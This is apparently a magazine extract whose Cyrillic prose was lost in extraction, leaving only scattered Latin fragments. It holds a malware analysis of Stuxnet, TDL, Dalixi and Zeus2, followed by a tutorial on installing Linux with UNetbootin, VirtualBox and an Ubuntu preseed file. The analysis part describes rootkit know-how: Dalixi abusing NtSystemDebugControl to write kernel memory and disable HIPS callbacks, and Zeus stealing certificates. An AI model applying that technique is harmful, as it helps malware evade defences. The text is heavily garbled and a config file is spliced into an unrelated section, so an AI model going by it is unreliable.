exe (TdlFsDumper, http://j.mp/tdl_dump). -
Hex-Rays , -
Comparison table (six feature columns; only the HIPS and MBR column headers survived extraction):
Stuxnet + + - + - -
TDL4    + + + + - +
TDL3    + + + + + -
Dalixi  + + + + - +
Zeus2   - + + + + -
FS .
Dalixi
.
, Dalixi HIPS
.
, callback-, -
.
HIPS -
(-
:
PsSetLoadImageNotifyRoutine, PsSetCreateProcessNotifyRoutine,
PsCreateThreadNotifyRoutine).,
, -
. Dalixi
ZwSystemDebugControl,-
ntdll.dll.
NTSYSAPI
NTSTATUS
NTAPI
NtSystemDebugControl(
IN SYSDBG_COMMAND Command,
IN PVOID InputBuffer OPTIONAL,
IN ULONG InputBufferLength,
OUT PVOID OutputBuffer OPTIONAL,
IN ULONG OutputBufferLength,
OUT PULONG ReturnLength OPTIONAL
);
,
SysDbgCopyMemoryChunks_1
, , , .
NtSystemDebugControl
, Dalixi -
SysDbgCopyMemoryChunks_1 ,
.
InputBuffer , -
:
typedef struct _CPY_MEM_CHUNCKS_BUFFER
{
void *Destination;
// pointer to kernel-mode destination buffer
void *Source;
// pointer to user-mode source buffer
ULONG Size;
// size of the user-mode source buffer
} CPY_MEM_CHUNCKS_BUFFER, *PCPY_MEM_CHUNCKS_BUFFER;
, ,
Dalixi -
, -
. callback-.
Zeus 2..-
Zeus.
,
-
(
).
, Zeus,
VNC
Jabber.
X.509--
, , ,
,
. -
CryptoAPI PFXImportCertStore
(
).
HCERTSTORE WINAPI PFXImportCertStore(
__in CRYPT_DATA_BLOB *pPFX,
__in LPCWSTR szPassword,
__in DWORD dwFlags
);
, , ,
Zeus ,
Stuxnet.
, zeus-.
-
, , ,
-.
, -
, .
Zeus -
,
,
MS Internet Explorer
. , ,
,
.
, -
, .
Zeus
.
,
,
-
Smartcard API.
, Zeus,
SpyEye, , ,
, -
. C&C
, -
, .
-
.
-
. -
, -
. z
,
,
-
.,
,
.
,
.-
,,
,.,
,
- (-
, Windows).,
(,
Linux),-
.
-
.
, -
.
, .
-
Linux,
Windows
-
.
UNetbootin
(unetbootin.sourceforge.net) -
-
USB-,
-
.
, Ubuntu (www.
ubuntu.com/desktop/get-ubuntu/windows-
installer) OpenSUSE (en.opensuse.org/
Instlux), UNetbootin (-
Linux, BSD,
Linux).,
, -
grub4dos ISO--
Linux BSD
, : , . , . , , .
UNIXOID
. .
,
UNIX-, ,
UNIX (,
BSD Linux-). -
UNetbootin, ISO-
initrd-Grub (
BSD).
Windows Linux. , -
. , ,
Solaris
, . -
VirtualBox,
(www.virtualbox.org).
Windows,
VirtualBox-3.2.10-66523-Win.exe.
,
-,
.
, -:
> cd c:\Program Files\Oracle\VirtualBox
> VBoxManage internalcommands createrawvmdk \
-filename c:\realhd.vmdk \
-rawdisk \\.\PhysicalDrive0 -register
realhd.vmdk, C:, -
(\\.\PhysicalDrive0 Windows),
'-register' -
VirtualBox. , ,
Linux :
$ sudo VBoxManage internalcommands \
createrawvmdk -filename ~/realhd.vmdk \
-rawdisk /dev/sda -register
ISO-Linux--
., -
NTFS-Partition MagicWinXP/Win2k3
diskmgmt.mscVista/Seven.
VirtualBox, -
.
, ,
CD-ROM.-
Linux.
, , (
,
VirtualBox). -
,
(
Windows
FreeBSD
).
,
.DHCP-,-
,
SSH-,
(,-
).
,
SSH.
Windows Linux. UNetbootinUNetbootin (Universal Netboot Installer) -
, USB-
UNIX-UNIX -
.
Windows, Linux,
( Linux BSD)
.,
Ubuntu.
.
unetbootin.sf.net
Download (for Windows for Linux).
( Linux--
).UNetbootin,
, , (NetInstall
HdMedia -
),
, ,
.,
UNetbootin
Linux-,
.
,
(
).,
.
,
ISO-Ubuntu,
.
Ubuntu-10.10 (-
),
(
preseed-).:
1.Ubuntu 10.10
:
$ sudo mount -o loop \
ubuntu-10.10-server-i386.iso /cdrom
$ mkdir mycd
$ rsync -a /cdrom/ mycd
2. preseed- (-
):
$ vi auto.seed
# locale
d-i debian-installer/locale string ru_RU
# keyboard: do not autodetect, use the us layout (not ru)
d-i console-setup/ask_detect boolean false
d-i console-setup/layoutcode string us
# network interface
d-i netcfg/choose_interface select auto
# FTP mirror
d-i mirror/protocol string ftp
# partitioning: use the largest free space, single partition
d-i partman-auto/init_automatically_partition select biggest_free
d-i partman-auto/choose_recipe select atomic
# Ext4
d-i partman/default_filesystem string ext4
# write the partition table without asking
d-i partman-partitioning/confirm_write_new_label boolean true
d-i partman/choose_partition select finish
d-i partman/confirm boolean true
d-i partman/confirm_nooverwrite boolean true
# user account "user" (password resu)
d-i passwd/user-fullname string Ubuntu User
FreeBSD Linux. Linux FreeBSD-,
Ubuntu,
UNetbootin, grub,
:
# cd /usr/ports/sysutils/grub
# sudo make install clean
# mkdir /boot/grub
# cp /usr/local/share/grub/i386-freebsd/* /boot/grub/
# touch /boot/grub/menu.lst
# sysctl kern.geom.debugflags=16
# grub-install /dev/ad0
menu.lst:
# vi /boot/grub/menu.lst
title Ubuntu 10.10 AutoInstall
# X, Y, Z: disk, slice and BSD partition holding the ISO image
map (hdX,Y,Z)/ubuntu-10.10-server-i386-auto.iso (hd32)
map --hook
chainloader (hd32)
.
d-i passwd/username string user
d-i passwd/user-password-crypted password 458c9bfe3b6716ad976383cf20a3dcf4
d-i user-setup/allow-password-weak boolean true
# package selection
# (kubuntu-desktop or ubuntu-server can be chosen instead)
tasksel tasksel/first multiselect ubuntu-desktop
# SSH server
d-i pkgsel/include string openssh-server
# bootloader
d-i grub-installer/with_other_os boolean true
# X server monitor autodetection
xserver-xorg xserver-xorg/autodetect_monitor boolean true
$ sudo cp auto.seed mycd/preseed
, -
us,
,
openssh-server user resu,
SSH.
-
( DHCP), d-i netcfg/choose_interface
select auto , -
:
# DNS server
d-i netcfg/get_nameservers string 8.8.8.8
# IP address
d-i netcfg/get_ipaddress string 192.168.0.1
# netmask
d-i netcfg/get_netmask string 255.255.2